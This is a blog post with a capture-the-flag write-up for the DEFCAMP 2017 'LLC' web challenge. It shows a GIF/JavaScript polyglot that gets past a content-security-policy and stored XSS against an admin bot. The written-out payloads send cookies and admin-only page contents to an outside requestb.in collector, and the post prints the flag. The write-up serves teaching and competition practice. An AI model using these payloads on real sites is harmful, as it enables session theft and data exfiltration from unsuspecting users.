DEFCAMP CTF Quals 2017 -- LLC -- WebChall Writeup

in #ctf7 years ago (edited)

DEFCAMP CTF Quals 2017 -- LLC -- WebChall Writeup

Problem description

We are looking for your feedback about our new amazing company! :-)


looking at the website we notice after submitting the form we got our inputs sent as they are

so maybe an xss? lets try

the problem here we got csp

content-security-policy: default-src 'none'; img-src 'self' *.imgur.com *.ibb.co; script-src 'self'; connect-src 'self'; style-src 'self' fonts.googleapis.com fonts.gstatic.com 'unsafe-inline'; font-src 'self' fonts.gstatic.com  fonts.googleapis.com;


the good part is that script-src points to 'self' so if we can use that upload function somehow to upload our js payload we can execute our exploit successfully

the form only accepts jpg jpeg png and gif with 500byte max file size

also there is image format check not only extension

so an image xss polyglot would solve this

here my gif payload

GIF89a= 'MUMBOJUMBOBOGUSBACON';document.location="https://requestb.in/um61ebum?v="+document.cookie;

we get our GIF link from the submited form result

then we resend our payload in the name and message fields with our js

<script type="text/javascript" charset="ISO-8859-1" src="__f8f2bb3ab8715ec9dfc6b89173c06a9f/xss.gif"></script>


and the bot connects back

QUERYSTRING

v: USERID=<SCRIPT>alert('XSS')</SCRIPT>



HEADERS

Accept-Encoding: gzip
Connect-Time: 1
Via: 1.1 vegur
Cf-Ray: 3a7bb8703f8e0f81-FRA
Cf-Connecting-Ip: 45.76.95.55
Cf-Visitor: {"scheme":"https"}
X-Request-Id: ec71d7c7-de29-4dd4-aca9-5186fa95060e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: requestb.in
Connection: close
Cookie: __cfduid=d8c8eca22ffed482d0d816ebe7ae673731506696251
Accept-Language: en-US,*
Cf-Ipcountry: DE
Total-Route-Time: 0
Referer: https://llc.dctf-quals-17.def.camp//bot.php?id=8173
User-Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1

nothing significant in the cookies

we notice there is a nice page bot.php 

requesting the page our selves gives nothing important

so lets make admin request it for us with his privilege

new payload

GIF89a= 'MUMBOJUMBOBOGUSBACON';var xh = new XMLHttpRequest();xh.open("GET", "bot.php?id=", false);xh.send();document.location="https://requestb.in/um61ebum?foo="+btoa(xh.responseText);


also still no flag yet

after a while of searching suddenly came across admin.php page

and we make admin get us the page

GIF89a= 'MUMBOJUMBOBOGUSBACON';var xh = new XMLHttpRequest();xh.open("GET", "admin.php", false);xh.send();document.location="https://requestb.in/um61ebum?foo="+btoa(xh.responseText);

and we got a flag in response

DCTF{808f50ca3f3182a30e76bb9fcc0fdcb7f75f4ce597f7abe1793e3942acf3ec9e}


Note: i dont get how js in .gif file works with the nosniff flag in headers

i think its served from cloudflare and admin is browsing the website without cloudflare? or from the bot js library used ?



Sort:  

Congratulations @maniffin! You have completed some achievement on Steemit and have been rewarded with new badge(s) :

You made your First Comment

Click on any badge to view your own Board of Honor on SteemitBoard.
For more information about SteemitBoard, click here

If you no longer want to receive notifications, reply to this comment with the word STOP

By upvoting this notification, you can help all Steemit users. Learn how here!

Congratulations @maniffin! You have received a personal award!

1 Year on Steemit
Click on the badge to view your Board of Honor.

Support SteemitBoard's project! Vote for its witness and get one more award!

Congratulations @maniffin! You received a personal award!

Happy Birthday! - You are on the Steem blockchain for 2 years!

You can view your badges on your Steem Board and compare to others on the Steem Ranking

Vote for @Steemitboard as a witness to get one more award and increased upvotes!

Coin Marketplace

STEEM 0.22
TRX 0.25
JST 0.039
BTC 95470.30
ETH 3313.37
USDT 1.00
SBD 3.15